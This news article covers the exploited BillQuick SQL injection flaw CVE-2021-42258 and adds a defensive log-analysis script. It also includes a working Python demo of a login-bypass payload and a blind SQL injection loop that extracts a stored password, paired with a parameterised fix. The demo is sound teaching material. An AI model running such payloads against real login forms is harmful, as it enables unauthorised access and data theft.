
BillQuick billing software exploit lets hackers deploy ransomware

The now-patched critical zero-day vulnerability also leaked sensitive data from the time and billing platform

Hackers are exploiting a flaw in the BillQuick Web Suite, a time and billing system from BQE Software, to deploy ransomware.

According to a blog post by security researchers at Huntress, cyber criminals were able to exploit CVE-2021-42258 to gain initial access to a US engineering company and deploy ransomware across the victim’s network.

BQE Software has 400,000 users worldwide. At the time of writing, the attackers behind the campaign have not been identified.

According to Caleb Stewart, a security researcher at Huntress Labs, the researchers were first alerted when several ransomware "canary files" were tripped in the environment of an engineering company managed by one of Huntress's partners. Canary files are decoys configured to raise an alert if they are changed, moved, or deleted.

Further investigation found Microsoft Defender antivirus alerts for malicious activity running as the MSSQLSERVER$ service account. Since that account belongs to the database engine rather than an interactive user, Stewart said it pointed to a web application being exploited to gain initial access.

“The server in question hosted BillQuick Web Suite 2020 (WS2020), and the connection logs indicated a foreign IP repeatedly sending POST requests to the web server logon endpoint, leading up to the initial compromise,” said Stewart.
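The indicator Stewart describes, repeated POSTs to the logon endpoint from a single foreign IP, is easy to pull out of IIS logs once you know to look for it. The script below is an added example written for this page, not Huntress's or BQE's tooling. It parses the W3C extended format that IIS writes by default; the field list, the endpoint path /BillQuick/Logon.aspx, the IP addresses and the log lines themselves are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed path of the BillQuick Web Suite logon page (not the real endpoint name).
LOGON_PATH = "/BillQuick/Logon.aspx"

# Constructed W3C extended log excerpt; the #Fields layout is an assumption.
# 203.0.113.77 posts to the logon page twelve times in twelve seconds,
# 198.51.100.20 is an ordinary user who logs in twice, minutes apart.
SAMPLE_LOG = "\n".join(
    ["#Software: Microsoft Internet Information Services 10.0",
     "#Fields: date time cs-method cs-uri-stem c-ip sc-status"]
    + ["2021-10-01 03:14:%02d POST %s 203.0.113.77 200" % (7 + i, LOGON_PATH)
       for i in range(12)]
    + ["2021-10-01 03:14:10 GET /BillQuick/Default.aspx 198.51.100.20 200",
       "2021-10-01 03:14:12 POST %s 198.51.100.20 302" % LOGON_PATH,
       "2021-10-01 03:20:01 POST %s 198.51.100.20 302" % LOGON_PATH]
)


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("request line before any #Fields directive")
        yield dict(zip(fields, line.split()))


def logon_post_bursts(text, endpoint=LOGON_PATH, window_seconds=60, threshold=10):
    """Return {client IP: peak count} for IPs that POST to endpoint at least
    `threshold` times inside any sliding window of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    posts = defaultdict(list)
    for rec in parse_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != endpoint.lower():
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        posts[rec["c-ip"]].append(ts)

    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # Slide the window start forward until it covers at most window_seconds.
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, n in logon_post_bursts(SAMPLE_LOG).items():
        print("%s: %d POSTs to %s within 60s" % (ip, n, LOGON_PATH))
```

Tune the window and threshold to the site's real traffic: a short, dense burst to the login page from one address that never successfully authenticates is the shape of both credential stuffing and automated injection tooling such as sqlmap, and either deserves a look.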

Suspecting that the attacker was exploiting BillQuick itself, the researchers reverse engineered the web application to retrace the attacker's steps. Working from a local copy of the application, they found that it built SQL queries by concatenating user-supplied strings directly into the query text.

“Essentially, this function allows a user to control the query that’s sent to the MSSQL database - which in this case, enables blind SQL injection via the application’s main login form,” said Stewart.

The researchers then recreated the victim's environment and confirmed that off-the-shelf tooling such as sqlmap could extract sensitive data from the BillQuick server without any authentication.
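To make the mechanism concrete, the following added example (written for this page, not BillQuick's code) shows a login check that concatenates user input into its SQL, the boolean-based blind injection that lets an attacker recover a stored password using nothing but the login's success or failure, and the parameterised query that closes the hole. It runs against an in-memory SQLite database as a stand-in for MSSQL; the Users table, its columns and the sample rows are assumptions.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the application's database (SQLite, not MSSQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("admin", "S3cret!Pw"), ("alice", "alicepw")])  # sample rows
    return con


def login_vulnerable(con, username, password):
    """Login check built by string concatenation: the caller controls the SQL text."""
    sql = ("SELECT COUNT(*) FROM Users WHERE Username = '" + username +
           "' AND Password = '" + password + "'")
    return con.execute(sql).fetchone()[0] > 0


def login_safe(con, username, password):
    """Same check with bound parameters: input is data and is never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM Users WHERE Username = ? AND Password = ?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def blind_extract_password(login, con, target_user, max_len=32):
    """Boolean-based blind SQL injection against a login function.

    The only signal is whether the login succeeds. Each probe injects a
    condition on one character of target_user's stored password; when the
    condition is true the WHERE clause matches and the login "succeeds".
    Returns whatever was recovered ('' when the login is not injectable).
    """
    charset = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            if ch == "'":
                continue  # would break the probe's own quoting
            # Closes the Username literal, ORs in the probe, comments out the rest.
            payload = ("' OR (SELECT SUBSTR(Password, %d, 1) FROM Users "
                       "WHERE Username = '%s') = '%s' --" % (pos, target_user, ch))
            try:
                hit = login(con, payload, "x")
            except sqlite3.Error:
                hit = False  # a real application would just report "login failed"
            if hit:
                found = ch
                break
        if found is None:
            break  # no character matched: end of the stored value
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Classic bypass: comment out the password check entirely.
    print("bypass (vulnerable):", login_vulnerable(db, "admin' --", "wrong"))
    print("bypass (safe):      ", login_safe(db, "admin' --", "wrong"))
    # Blind extraction of admin's password, one character per outer loop.
    print("extracted (vulnerable):", repr(blind_extract_password(login_vulnerable, db, "admin")))
    print("extracted (safe):      ", repr(blind_extract_password(login_safe, db, "admin")))
```

The extraction loop is what sqlmap automates: no data ever appears in a response, yet a yes/no oracle plus a few hundred requests per field is enough to read out anything the database connection can see. On MSSQL the same injection point also accepts stacked statements, which is why the privilege of the database login matters so much.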


“Because these versions of BillQuick used the sa (System Administrator) MSSQL user for database authentication, this SQL injection also allowed the use of the xp_cmdshell procedure to remotely execute code on the underlying Windows operating system,” said Stewart.

Huntress has been in contact with BQE Software, which has since patched the flaw, and is still working with the company on "multiple other security concerns".

Despite BQE Software’s cooperation, Stewart said other well-established vendors are doing “very little to proactively secure their applications and subject their unwitting customers to significant liability when sensitive data is inevitably leaked and/or ransomed”.

“In 2021, it’s still extremely common for vendors to sweep cyber security issues under the rug; we have the impression that BQE is taking our feedback seriously,” he added.
